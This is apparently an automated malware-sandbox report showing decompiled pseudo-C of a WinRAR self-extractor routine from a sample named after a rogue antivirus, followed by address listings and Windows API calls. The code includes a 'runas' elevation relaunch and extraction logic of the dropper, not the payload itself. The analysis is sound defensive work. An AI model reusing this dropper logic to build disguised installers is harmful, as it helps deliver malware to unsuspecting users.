                                                                                                                                                      									_push(0x111);
                                                                                                                                                      									_push(_t258);
                                                                                                                                                      									__eflags = _t126 - _t247;
                                                                                                                                                      									if(_t126 != _t247) {
                                                                                                                                                      										PostMessageA();
                                                                                                                                                      									} else {
                                                                                                                                                      										SendMessageA(); // executed
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f68; // 0x0
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								SetDlgItemTextA(_t258, _t247, E004098D0(0x7d));
                                                                                                                                                      							}
                                                                                                                                                      							L100:
                                                                                                                                                      							return _t247;
                                                                                                                                                      						}
                                                                                                                                                      						E0040BF72(_t244, _t258, _t258,  *0x41a818, 0); // executed
                                                                                                                                                      						_t136 =  *0x41a81c;
                                                                                                                                                      						__eflags = _t136;
                                                                                                                                                      						if(_t136 != 0) {
                                                                                                                                                      							__eflags =  *0x419f8c; // 0x1
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t233 =  *0x418ecc; // 0x0
                                                                                                                                                      								E00406D16(_t233,  *0x414c74, _a8, _t136);
                                                                                                                                                      								E0040A1DE( *0x41a81c);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t247 = 1;
                                                                                                                                                      						__eflags =  *0x419f8c - _t247; // 0x1
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							L87:
                                                                                                                                                      							E0040BF72(_t244, _t258, _t258,  *0x41a818, _t247);
                                                                                                                                                      							goto L89;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t138 = DialogBoxParamA( *0x414c74, "LICENSEDLG", 0, E0040CB0C, 0);
                                                                                                                                                      							__eflags = _t138;
                                                                                                                                                      							if(_t138 != 0) {
                                                                                                                                                      								goto L87;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      							EndDialog(_t258, 1);
                                                                                                                                                      							goto L100;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_v13936 = 0;
                                                                                                                                                      						_t249 = 0x96;
                                                                                                                                                      						do {
                                                                                                                                                      							E0040A5BB( &_v13936, " ");
                                                                                                                                                      							E0040A5BB( &_v13936, E004098D0(_t249));
                                                                                                                                                      							_t249 = _t249 + 1;
                                                                                                                                                      							__eflags = _t249 - 0x9b;
                                                                                                                                                      						} while (_t249 <= 0x9b);
                                                                                                                                                      						__eflags =  *0x419f8c; // 0x1
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t234 =  *0x418ecc; // 0x0
                                                                                                                                                      							E00406D16(_t234,  *0x414c74, _a8,  &_v13936);
                                                                                                                                                      						}
                                                                                                                                                      						goto L80;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_t98 != 1) {
                                                                                                                                                      					L5:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t157 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t157 == 0) {
                                                                                                                                                      					GetDlgItemTextA(_t258, 0x65,  &_v1104, 0x400);
                                                                                                                                                      					__eflags =  *0x419f70; // 0x0
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						__eflags =  *0x419f68; // 0x0
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t160 = GetDlgItem(_t258, 0x67);
                                                                                                                                                      							_a8 = _t160;
                                                                                                                                                      							__eflags =  *0x419f74; // 0x0
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								SendMessageA(_t160, 0xb1, 0, 0xffffffff);
                                                                                                                                                      								SendMessageA(_a8, 0xc2, 0, 0x4125aa);
                                                                                                                                                      							}
                                                                                                                                                      							SetFocus(_a8);
                                                                                                                                                      							_a11 = 0;
                                                                                                                                                      							_t163 = E004058C1(0, _t258,  &_v1104, 0, 0); // executed
                                                                                                                                                      							__eflags = _t163;
                                                                                                                                                      							if(_t163 != 0) {
                                                                                                                                                      								L25:
                                                                                                                                                      								_t165 = SetCurrentDirectoryA( &_v1104); // executed
                                                                                                                                                      								__eflags = _t165;
                                                                                                                                                      								_a15 = _t165 != 0;
                                                                                                                                                      								__eflags = _a15;
                                                                                                                                                      								if(_a15 == 0) {
                                                                                                                                                      									_t220 = GetLastError();
                                                                                                                                                      									__eflags = _t220 - 5;
                                                                                                                                                      									if(_t220 == 5) {
                                                                                                                                                      										_a11 = 1;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_t166 = E00406E67();
                                                                                                                                                      								__eflags = _t166;
                                                                                                                                                      								if(_t166 == 0) {
                                                                                                                                                      									L35:
                                                                                                                                                      									__eflags = _a15;
                                                                                                                                                      									if(_a15 != 0) {
                                                                                                                                                      										E0040B908(_t258,  &_v1104);
                                                                                                                                                      										 *0x419f6c = 1;
                                                                                                                                                      										E0040303B(_t258, 0x66, 0);
                                                                                                                                                      										E0040303B(_t258, 0x65, 0);
                                                                                                                                                      										E0040303B(_t258, 1, 0);
                                                                                                                                                      										E0040BF72(_t244, _t258, _t258,  *0x41a818, 5);
                                                                                                                                                      										E0040BF72(_t244, _t258, _t258,  *0x41a818, 2);
                                                                                                                                                      										E0040B2FB(_t244, __eflags, "C:\Users\hardz\Desktop\Endermanch@AnViPC2009.exe", "C:\Users\hardz\Desktop\Endermanch@AnViPC2009.exe"); // executed
                                                                                                                                                      										E0040BF72(_t244, _t258, _t258,  *0x41a818, 6);
                                                                                                                                                      										__eflags =  *0x419f78; // 0x2
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											__eflags =  *0x419f74; // 0x0
                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                      												__eflags =  *0x41a828;
                                                                                                                                                      												if( *0x41a828 == 0) {
                                                                                                                                                      													E0040BF72(_t244, _t258, 0,  *0x41a818, 4); // executed
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										E0040303B(_t258, 1, 1);
                                                                                                                                                      										 *0x419f6c = 0;
                                                                                                                                                      										goto L56;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *0x419f91; // 0x0
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										_a11 = 0;
                                                                                                                                                      									}
                                                                                                                                                      									L38:
                                                                                                                                                      									__eflags = _a11;
                                                                                                                                                      									_a11 = _a11 == 0;
                                                                                                                                                      									__eflags = _a11;
                                                                                                                                                      									if(_a11 != 0) {
                                                                                                                                                      										L49:
                                                                                                                                                      										wsprintfA( &_v2640, "\"%s\"\n%s",  &_v1104, E004098D0(0x82));
                                                                                                                                                      										E0040321D(0x414c7c, 1);
                                                                                                                                                      										MessageBoxA(_t258,  &_v2640, E004098D0(0x7e), 0x30);
                                                                                                                                                      										 *0x419f74 =  *0x419f74 + 1;
                                                                                                                                                      										__eflags =  *0x419f74;
                                                                                                                                                      										L50:
                                                                                                                                                      										_push(0);
                                                                                                                                                      										goto L16;
                                                                                                                                                      									}
                                                                                                                                                      									GetModuleFileNameA(0,  &_v2128, 0x400);
                                                                                                                                                      									wsprintfA( &_v5340, "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"",  &_v1104, 0x41a792, 0x41a392);
                                                                                                                                                      									_t259 = _t259 + 0x14;
                                                                                                                                                      									_v80.lpFile =  &_v2128;
                                                                                                                                                      									_v80.cbSize = 0x3c;
                                                                                                                                                      									_v80.fMask = 0x40;
                                                                                                                                                      									_v80.hwnd = _t258;
                                                                                                                                                      									_v80.lpVerb = "runas";
                                                                                                                                                      									_v80.lpParameters =  &_v5340;
                                                                                                                                                      									_v80.lpDirectory = 0x412350;
                                                                                                                                                      									_v80.nShow = 1;
                                                                                                                                                      									_v80.hInstApp = 0;
                                                                                                                                                      									_t202 = CreateFileMappingA(0xffffffff, 0, 0x8000004, 0, 0x10000, "winrarsfxmappingfile.tmp");
                                                                                                                                                      									_a12 = _t202;
                                                                                                                                                      									__eflags = _t202;
                                                                                                                                                      									if(_t202 != 0) {
                                                                                                                                                      										_a16 = MapViewOfFile(_t202, 2, 0, 0, 0);
                                                                                                                                                      										_t209 = GetCommandLineA();
                                                                                                                                                      										__eflags = _t209;
                                                                                                                                                      										if(_t209 != 0) {
                                                                                                                                                      											E0040DBC0(_a16, _t209, 0x10000);
                                                                                                                                                      										}
                                                                                                                                                      										UnmapViewOfFile(_a16);
                                                                                                                                                      									}
                                                                                                                                                      									_t204 = ShellExecuteExA( &_v80);
                                                                                                                                                      									__eflags = _t204;
                                                                                                                                                      									if(_t204 == 0) {
                                                                                                                                                      										_a11 = 1;
                                                                                                                                                      									} else {
                                                                                                                                                      										WaitForInputIdle(_v80.hProcess, 0x2710);
                                                                                                                                                      										Sleep(0x1f4);
                                                                                                                                                      										 *0x41a828 = _v80.hProcess;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _a12;
                                                                                                                                                      									if(_a12 != 0) {
                                                                                                                                                      										CloseHandle(_a12);
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _a11;
                                                                                                                                                      									if(_a11 == 0) {
                                                                                                                                                      										goto L50;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L49;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *0x419f91; // 0x0
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									goto L35;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _a15;
                                                                                                                                                      								if(_a15 == 0) {
                                                                                                                                                      									goto L38;
                                                                                                                                                      								} else {
                                                                                                                                                      									wsprintfA( &_v2128, "__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                                                                                                                      									_t259 = _t259 + 0xc;
                                                                                                                                                      									E00404E8A( &_v5744);
                                                                                                                                                      									_t217 = E0040519F( &_v5744,  &_v2128, 0, 1); // executed
                                                                                                                                                      									_a15 = _t217;
                                                                                                                                                      									__eflags = _t217;
                                                                                                                                                      									if(_t217 == 0) {
                                                                                                                                                      										_t219 = GetLastError();
                                                                                                                                                      										__eflags = _t219 - 5;
                                                                                                                                                      										if(_t219 == 5) {
                                                                                                                                                      											_a11 = 1;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									E0040503B(0,  &_v5744);
                                                                                                                                                      									goto L35;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							_t221 = GetLastError();
                                                                                                                                                      							__eflags = _t221 - 5;
                                                                                                                                                      							if(_t221 == 5) {
                                                                                                                                                      								L24:
                                                                                                                                                      								_a11 = 1;
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t221 - 3;
                                                                                                                                                      							if(_t221 != 3) {
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							goto L24;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *0x419f78 = 2;
                                                                                                                                                      							L56:
                                                                                                                                                      							__eflags =  *0x419f74; // 0x0
                                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                                      								goto L15;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f78; // 0x2
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								goto L15;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x419f70 = 1;
                                                                                                                                                      							SetDlgItemTextA(_t258, 1, E004098D0(0x7d));
                                                                                                                                                      							_t182 =  *0x414c7c; // 0x0
                                                                                                                                                      							__eflags = _t182 - 9;
                                                                                                                                                      							if(_t182 != 9) {
                                                                                                                                                      								__eflags = _t182 - 3;
                                                                                                                                                      								_t239 = ((0 | _t182 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                      								__eflags = _t239;
                                                                                                                                                      								_t255 = _t239;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t62 = _t182 + 0x7a; // 0x7a
                                                                                                                                                      								_t255 = _t62;
                                                                                                                                                      							}
                                                                                                                                                      							_t183 = E004098D0(0x7e);
                                                                                                                                                      							MessageBoxA(_t258, E004098D0(_t255), _t183, 0x30);
                                                                                                                                                      							goto L8;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags =  *0x419f68; // 0x0
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							 *0x419f78 = 2;
                                                                                                                                                      						}
                                                                                                                                                      						L15:
                                                                                                                                                      						_push(1);
                                                                                                                                                      						L16:
                                                                                                                                                      						EndDialog(_t258, ??); // executed
                                                                                                                                                      						L8:
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t224 = _t157 - 1;
                                                                                                                                                      				if(_t224 == 0) {
                                                                                                                                                      					__eflags =  *0x419f6c; // 0x0
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						 *0x419f78 = 2;
                                                                                                                                                      						goto L50;
                                                                                                                                                      					}
                                                                                                                                                      					 *0x419f78 = 1;
                                                                                                                                                      					__eflags =  *0x419f74; // 0x0
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						goto L8;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t224 == 0x64) {
                                                                                                                                                      					_t228 = E00402794(_t258, E004098D0(0x64),  &_v1104);
                                                                                                                                                      					__eflags = _t228;
                                                                                                                                                      					if(_t228 != 0) {
                                                                                                                                                      						SetDlgItemTextA(_t258, 0x65,  &_v1104);
                                                                                                                                                      					}
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				goto L5;
                                                                                                                                                      			}



















































                                                                                                                                                      0x0040cc05
                                                                                                                                                      0x0040cc05
                                                                                                                                                      0x0040cc0d
                                                                                                                                                      0x0040cc14
                                                                                                                                                      0x0040cc2b
                                                                                                                                                      0x0040cc33
                                                                                                                                                      0x0040cc38
                                                                                                                                                      0x0040d08b
                                                                                                                                                      0x0040d090
                                                                                                                                                      0x0040d096
                                                                                                                                                      0x0040d09c
                                                                                                                                                      0x0040d09e
                                                                                                                                                      0x0040d0a9
                                                                                                                                                      0x0040d0a9
                                                                                                                                                      0x0040d0af
                                                                                                                                                      0x0040d0b4
                                                                                                                                                      0x0040d0b6
                                                                                                                                                      0x0040d0c2
                                                                                                                                                      0x0040d0c2
                                                                                                                                                      0x0040d0c9
                                                                                                                                                      0x0040d0d7
                                                                                                                                                      0x0040d0e1
                                                                                                                                                      0x0040d0ef
                                                                                                                                                      0x0040d0f5
                                                                                                                                                      0x0040d0ff
                                                                                                                                                      0x0040d131
                                                                                                                                                      0x0040d137
                                                                                                                                                      0x0040d13a
                                                                                                                                                      0x0040d13c
                                                                                                                                                      0x0040d147
                                                                                                                                                      0x0040d157
                                                                                                                                                      0x0040d160
                                                                                                                                                      0x0040d16b
                                                                                                                                                      0x0040d16e
                                                                                                                                                      0x0040d174
                                                                                                                                                      0x0040d176
                                                                                                                                                      0x0040d17d
                                                                                                                                                      0x0040d17d
                                                                                                                                                      0x0040d18f
                                                                                                                                                      0x0040d13e
                                                                                                                                                      0x0040d143
                                                                                                                                                      0x0040d143
                                                                                                                                                      0x0040d1a1
                                                                                                                                                      0x0040d1b0
                                                                                                                                                      0x0040d1b3
                                                                                                                                                      0x0040d1b8
                                                                                                                                                      0x0040d1be
                                                                                                                                                      0x0040d1c0
                                                                                                                                                      0x0040d1c0
                                                                                                                                                      0x0040d1ca
                                                                                                                                                      0x0040d1d3
                                                                                                                                                      0x0040d1ec
                                                                                                                                                      0x0040d1f2
                                                                                                                                                      0x0040d1f7
                                                                                                                                                      0x0040d1fd
                                                                                                                                                      0x0040d208
                                                                                                                                                      0x0040d208
                                                                                                                                                      0x0040d20d
                                                                                                                                                      0x0040d213
                                                                                                                                                      0x0040d270
                                                                                                                                                      0x0040d270
                                                                                                                                                      0x0040d276
                                                                                                                                                      0x0040d305
                                                                                                                                                      0x0040d305
                                                                                                                                                      0x0040d306
                                                                                                                                                      0x0040d306
                                                                                                                                                      0x0040d30d
                                                                                                                                                      0x0040d313
                                                                                                                                                      0x0040d313
                                                                                                                                                      0x0040d319
                                                                                                                                                      0x0040d31f
                                                                                                                                                      0x0040d325
                                                                                                                                                      0x0040d32e
                                                                                                                                                      0x0040d32e
                                                                                                                                                      0x0040d333
                                                                                                                                                      0x0040d338
                                                                                                                                                      0x0040d33a
                                                                                                                                                      0x0040d33c
                                                                                                                                                      0x0040d342
                                                                                                                                                      0x0040d344
                                                                                                                                                      0x0040d345
                                                                                                                                                      0x0040d346
                                                                                                                                                      0x0040d34b
                                                                                                                                                      0x0040d34c
                                                                                                                                                      0x0040d34e
                                                                                                                                                      0x0040d358
                                                                                                                                                      0x0040d350
                                                                                                                                                      0x0040d350
                                                                                                                                                      0x0040d350
                                                                                                                                                      0x0040d34e
                                                                                                                                                      0x0040d342
                                                                                                                                                      0x0040d35e
                                                                                                                                                      0x0040d364
                                                                                                                                                      0x0040d370
                                                                                                                                                      0x0040d370
                                                                                                                                                      0x0040d376
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d376
                                                                                                                                                      0x0040d284
                                                                                                                                                      0x0040d289
                                                                                                                                                      0x0040d28e
                                                                                                                                                      0x0040d290
                                                                                                                                                      0x0040d292
                                                                                                                                                      0x0040d298
                                                                                                                                                      0x0040d29a
                                                                                                                                                      0x0040d2aa
                                                                                                                                                      0x0040d2b5
                                                                                                                                                      0x0040d2b5
                                                                                                                                                      0x0040d298
                                                                                                                                                      0x0040d2bc
                                                                                                                                                      0x0040d2bd
                                                                                                                                                      0x0040d2c3
                                                                                                                                                      0x0040d2f4
                                                                                                                                                      0x0040d2fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d2c5
                                                                                                                                                      0x0040d2d7
                                                                                                                                                      0x0040d2dd
                                                                                                                                                      0x0040d2df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d2e3
                                                                                                                                                      0x0040d2e9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d2e9
                                                                                                                                                      0x0040d215
                                                                                                                                                      0x0040d215
                                                                                                                                                      0x0040d21b
                                                                                                                                                      0x0040d220
                                                                                                                                                      0x0040d22c
                                                                                                                                                      0x0040d23f
                                                                                                                                                      0x0040d244
                                                                                                                                                      0x0040d245
                                                                                                                                                      0x0040d245
                                                                                                                                                      0x0040d24d
                                                                                                                                                      0x0040d253
                                                                                                                                                      0x0040d255
                                                                                                                                                      0x0040d26b
                                                                                                                                                      0x0040d26b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d253
                                                                                                                                                      0x0040d213
                                                                                                                                                      0x0040cc3f
                                                                                                                                                      0x0040cc50
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc50
                                                                                                                                                      0x0040cc45
                                                                                                                                                      0x0040cc46
                                                                                                                                                      0x0040ccc0
                                                                                                                                                      0x0040ccc6
                                                                                                                                                      0x0040cccc
                                                                                                                                                      0x0040cceb
                                                                                                                                                      0x0040ccf1
                                                                                                                                                      0x0040cd05
                                                                                                                                                      0x0040cd0b
                                                                                                                                                      0x0040cd0e
                                                                                                                                                      0x0040cd14
                                                                                                                                                      0x0040cd25
                                                                                                                                                      0x0040cd35
                                                                                                                                                      0x0040cd35
                                                                                                                                                      0x0040cd3a
                                                                                                                                                      0x0040cd49
                                                                                                                                                      0x0040cd4c
                                                                                                                                                      0x0040cd57
                                                                                                                                                      0x0040cd59
                                                                                                                                                      0x0040cd6b
                                                                                                                                                      0x0040cd72
                                                                                                                                                      0x0040cd78
                                                                                                                                                      0x0040cd7a
                                                                                                                                                      0x0040cd7e
                                                                                                                                                      0x0040cd81
                                                                                                                                                      0x0040cd83
                                                                                                                                                      0x0040cd85
                                                                                                                                                      0x0040cd88
                                                                                                                                                      0x0040cd8a
                                                                                                                                                      0x0040cd8a
                                                                                                                                                      0x0040cd88
                                                                                                                                                      0x0040cd8e
                                                                                                                                                      0x0040cd93
                                                                                                                                                      0x0040cd95
                                                                                                                                                      0x0040cdfd
                                                                                                                                                      0x0040cdfd
                                                                                                                                                      0x0040ce00
                                                                                                                                                      0x0040cf88
                                                                                                                                                      0x0040cf94
                                                                                                                                                      0x0040cf9a
                                                                                                                                                      0x0040cfa3
                                                                                                                                                      0x0040cfab
                                                                                                                                                      0x0040cfb9
                                                                                                                                                      0x0040cfc7
                                                                                                                                                      0x0040cfd6
                                                                                                                                                      0x0040cfe4
                                                                                                                                                      0x0040cfe9
                                                                                                                                                      0x0040cfef
                                                                                                                                                      0x0040cff1
                                                                                                                                                      0x0040cff7
                                                                                                                                                      0x0040cff9
                                                                                                                                                      0x0040cfff
                                                                                                                                                      0x0040d00a
                                                                                                                                                      0x0040d00a
                                                                                                                                                      0x0040cfff
                                                                                                                                                      0x0040cff7
                                                                                                                                                      0x0040d012
                                                                                                                                                      0x0040d017
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d017
                                                                                                                                                      0x0040ce06
                                                                                                                                                      0x0040ce0c
                                                                                                                                                      0x0040ce0e
                                                                                                                                                      0x0040ce0e
                                                                                                                                                      0x0040ce11
                                                                                                                                                      0x0040ce11
                                                                                                                                                      0x0040ce14
                                                                                                                                                      0x0040ce18
                                                                                                                                                      0x0040ce1b
                                                                                                                                                      0x0040cf2a
                                                                                                                                                      0x0040cf48
                                                                                                                                                      0x0040cf58
                                                                                                                                                      0x0040cf6f
                                                                                                                                                      0x0040cf75
                                                                                                                                                      0x0040cf75
                                                                                                                                                      0x0040cf7b
                                                                                                                                                      0x0040cf7b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf7b
                                                                                                                                                      0x0040ce2e
                                                                                                                                                      0x0040ce51
                                                                                                                                                      0x0040ce57
                                                                                                                                                      0x0040ce71
                                                                                                                                                      0x0040ce7d
                                                                                                                                                      0x0040ce84
                                                                                                                                                      0x0040ce8b
                                                                                                                                                      0x0040ce8e
                                                                                                                                                      0x0040ce95
                                                                                                                                                      0x0040ce98
                                                                                                                                                      0x0040ce9f
                                                                                                                                                      0x0040cea6
                                                                                                                                                      0x0040cea9
                                                                                                                                                      0x0040ceaf
                                                                                                                                                      0x0040ceb2
                                                                                                                                                      0x0040ceb4
                                                                                                                                                      0x0040cec2
                                                                                                                                                      0x0040cec5
                                                                                                                                                      0x0040cecb
                                                                                                                                                      0x0040cecd
                                                                                                                                                      0x0040ced4
                                                                                                                                                      0x0040ced4
                                                                                                                                                      0x0040cedc
                                                                                                                                                      0x0040cedc
                                                                                                                                                      0x0040cee6
                                                                                                                                                      0x0040ceec
                                                                                                                                                      0x0040ceee
                                                                                                                                                      0x0040cf13
                                                                                                                                                      0x0040cef0
                                                                                                                                                      0x0040cef8
                                                                                                                                                      0x0040cf03
                                                                                                                                                      0x0040cf0c
                                                                                                                                                      0x0040cf0c
                                                                                                                                                      0x0040cf17
                                                                                                                                                      0x0040cf1a
                                                                                                                                                      0x0040cf1f
                                                                                                                                                      0x0040cf1f
                                                                                                                                                      0x0040cf25
                                                                                                                                                      0x0040cf28
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf28
                                                                                                                                                      0x0040cd97
                                                                                                                                                      0x0040cd9d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd9f
                                                                                                                                                      0x0040cda2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cda4
                                                                                                                                                      0x0040cdb7
                                                                                                                                                      0x0040cdbd
                                                                                                                                                      0x0040cdc6
                                                                                                                                                      0x0040cddb
                                                                                                                                                      0x0040cde0
                                                                                                                                                      0x0040cde3
                                                                                                                                                      0x0040cde5
                                                                                                                                                      0x0040cde7
                                                                                                                                                      0x0040cde9
                                                                                                                                                      0x0040cdec
                                                                                                                                                      0x0040cdee
                                                                                                                                                      0x0040cdee
                                                                                                                                                      0x0040cdec
                                                                                                                                                      0x0040cdf8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cdf8
                                                                                                                                                      0x0040cda2
                                                                                                                                                      0x0040cd5b
                                                                                                                                                      0x0040cd5d
                                                                                                                                                      0x0040cd60
                                                                                                                                                      0x0040cd67
                                                                                                                                                      0x0040cd67
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cd67
                                                                                                                                                      0x0040cd62
                                                                                                                                                      0x0040cd65
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ccf3
                                                                                                                                                      0x0040ccf3
                                                                                                                                                      0x0040d01d
                                                                                                                                                      0x0040d01d
                                                                                                                                                      0x0040d023
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d029
                                                                                                                                                      0x0040d02f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d03a
                                                                                                                                                      0x0040d048
                                                                                                                                                      0x0040d04e
                                                                                                                                                      0x0040d053
                                                                                                                                                      0x0040d056
                                                                                                                                                      0x0040d05f
                                                                                                                                                      0x0040d069
                                                                                                                                                      0x0040d069
                                                                                                                                                      0x0040d06c
                                                                                                                                                      0x0040d058
                                                                                                                                                      0x0040d058
                                                                                                                                                      0x0040d058
                                                                                                                                                      0x0040d058
                                                                                                                                                      0x0040d072
                                                                                                                                                      0x0040d080
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d080
                                                                                                                                                      0x0040ccce
                                                                                                                                                      0x0040ccce
                                                                                                                                                      0x0040ccd4
                                                                                                                                                      0x0040ccd6
                                                                                                                                                      0x0040ccd6
                                                                                                                                                      0x0040cce0
                                                                                                                                                      0x0040cce0
                                                                                                                                                      0x0040cce2
                                                                                                                                                      0x0040cce3
                                                                                                                                                      0x0040cc80
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc82
                                                                                                                                                      0x0040cccc
                                                                                                                                                      0x0040cc48
                                                                                                                                                      0x0040cc49
                                                                                                                                                      0x0040cc88
                                                                                                                                                      0x0040cc8e
                                                                                                                                                      0x0040cca2
                                                                                                                                                      0x0040cca2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cca2
                                                                                                                                                      0x0040cc90
                                                                                                                                                      0x0040cc9a
                                                                                                                                                      0x0040cca0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cca0
                                                                                                                                                      0x0040cc4e
                                                                                                                                                      0x0040cc67
                                                                                                                                                      0x0040cc6c
                                                                                                                                                      0x0040cc6e
                                                                                                                                                      0x0040cc7a
                                                                                                                                                      0x0040cc7a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cc6e
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040CC7A
                                                                                                                                                      • GetDlgItemTextA.USER32 ref: 0040CCC0
                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0040CCE3
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040CD05
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CD25
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CD35
                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CD3A
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 0040CD5B
                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00000000), ref: 0040CD72
                                                                                                                                                      • GetLastError.KERNEL32(?), ref: 0040CD83
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040CDA4
                                                                                                                                                      • wsprintfA.USER32 ref: 0040CDB7
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000001), ref: 0040CDE7
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,?), ref: 0040CE2E
                                                                                                                                                      • wsprintfA.USER32 ref: 0040CE51
                                                                                                                                                      • CreateFileMappingA.KERNEL32 ref: 0040CEA9
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040CEBC
                                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 0040CEC5
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(?), ref: 0040CEDC
                                                                                                                                                      • ShellExecuteExA.SHELL32(0000003C), ref: 0040CEE6
                                                                                                                                                      • WaitForInputIdle.USER32 ref: 0040CEF8
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040CF03
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040CF1F
                                                                                                                                                      • wsprintfA.USER32 ref: 0040CF48
                                                                                                                                                      • MessageBoxA.USER32 ref: 0040CF6F
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040D048
                                                                                                                                                      • MessageBoxA.USER32 ref: 0040D080
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D0A9
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000069,00000172,00000000,19050BC3), ref: 0040D0C2
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D0D1
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040D0E1
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040D0EF
                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040D0FF
                                                                                                                                                      • CreateWindowExA.USER32 ref: 0040D131
                                                                                                                                                      • SetMenu.USER32(?,00000067), ref: 0040D143
                                                                                                                                                      • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000203), ref: 0040D157
